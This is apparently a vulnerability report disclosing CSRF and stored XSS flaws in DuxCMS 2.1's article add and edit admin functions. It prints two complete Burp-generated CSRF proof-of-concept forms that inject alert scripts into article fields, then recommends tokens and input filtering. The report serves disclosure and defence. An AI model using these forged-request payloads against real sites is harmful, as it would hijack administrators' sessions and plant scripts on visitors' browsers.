Add article has CSRF and XSS

## Add/Edit article

login in the system,and add article like this.

![test-1](https://images.gitee.com/uploads/images/2020/0109/094844_05264d4c_5619987.png "屏幕截图.png")

The captured data packet has an xss vulnerability in the content parameter.

![test-2](https://images.gitee.com/uploads/images/2020/0109/094931_1d1c49c1_5619987.png "屏幕截图.png")

### edit article test

Generate CSRF payload using Burpsuite plugin.

![test-3](https://images.gitee.com/uploads/images/2020/0109/095012_3207d3a7_5619987.png "屏幕截图.png")

copy that and edit like this.This is a edit article payload

```
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/edit" method="POST">
      <input type="hidden" name="class_id" value="2" />
      <input type="hidden" name="title" value="test333333" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="get_image" value="1" />
      <input type="hidden" name="get_image_num" value="1" />
      <input type="hidden" name="get_description" value="1" />
      <input type="hidden" name="description" value="sfdadsfadfa" />
      <input type="hidden" name="keywords" value="sfdadsfadfa" />
      <input type="hidden" name="taglink" value="1" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="font_color" value="0" />
      <input type="hidden" name="urltitle" value="test2" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="time" value="2020&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="copyfrom" value="sds&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="views" value="6" />
      <input type="hidden" name="sequence" value="0" />
      <input type="hidden" name="tpl" value="" />
      <input type="hidden" name="content_id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```

if you want to edit "test111111"

![test=3](https://images.gitee.com/uploads/images/2020/0109/095731_37c62e5e_5619987.png "屏幕截图.png")

run this payload like this and it will edit successfully this article content.

![test-4](https://images.gitee.com/uploads/images/2020/0109/095843_5e5b5d57_5619987.png "屏幕截图.png")

![test-5](https://images.gitee.com/uploads/images/2020/0109/095856_be37f395_5619987.png "屏幕截图.png")

access this article and it will alert something like this.

![test-6](https://images.gitee.com/uploads/images/2020/0109/100006_534ff816_5619987.png "屏幕截图.png")

### Add article test

#### CSRF and XSS Payload

this payload is use add article and input evil javascript in "content" parameter.

```
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add" method="POST">
      <input type="hidden" name="class&#95;id" value="1" />
      <input type="hidden" name="title" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="get&#95;image" value="1" />
      <input type="hidden" name="get&#95;image&#95;num" value="1" />
      <input type="hidden" name="get&#95;description" value="1" />
      <input type="hidden" name="description" value="adfads" />
      <input type="hidden" name="keywords" value="adfa" />
      <input type="hidden" name="taglink" value="1" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="font&#95;color" value="0" />
      <input type="hidden" name="urltitle" value="" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="time" value="2020&#47;01&#47;08&#32;15&#58;49" />
      <input type="hidden" name="copyfrom" value="æ&#156;&#172;ç&#171;&#153;" />
      <input type="hidden" name="views" value="0" />
      <input type="hidden" name="sequence" value="0" />
      <input type="hidden" name="tpl" value="" />
      <input type="hidden" name="content&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```

run this payload.

![test-8](https://images.gitee.com/uploads/images/2020/0109/100103_5bba5b71_5619987.png "屏幕截图.png")

and you can see add one article "aaaaaaaaaaaaaaaaa"

![test-9](https://images.gitee.com/uploads/images/2020/0109/100138_8d88c7aa_5619987.png "屏幕截图.png")

access it and it will successfully run some evil javascript like this.

![test10](https://images.gitee.com/uploads/images/2020/0109/100234_1cf08884_5619987.png "屏幕截图.png")

Csrf and xss vulnerabilities are caused because tokens are not set for functions and sensitive characters are filtered.

## Solution

1)Set token for this function.
2)Filtering sensitive characters for any input data.

王爷/DuxCMS2.1支持php7.0以上版本

内容风险标识

评论 (0)

王爷/DuxCMS2.1支持php7.0以上版本 .gitee-modal { width: 500px !important; }

内容风险标识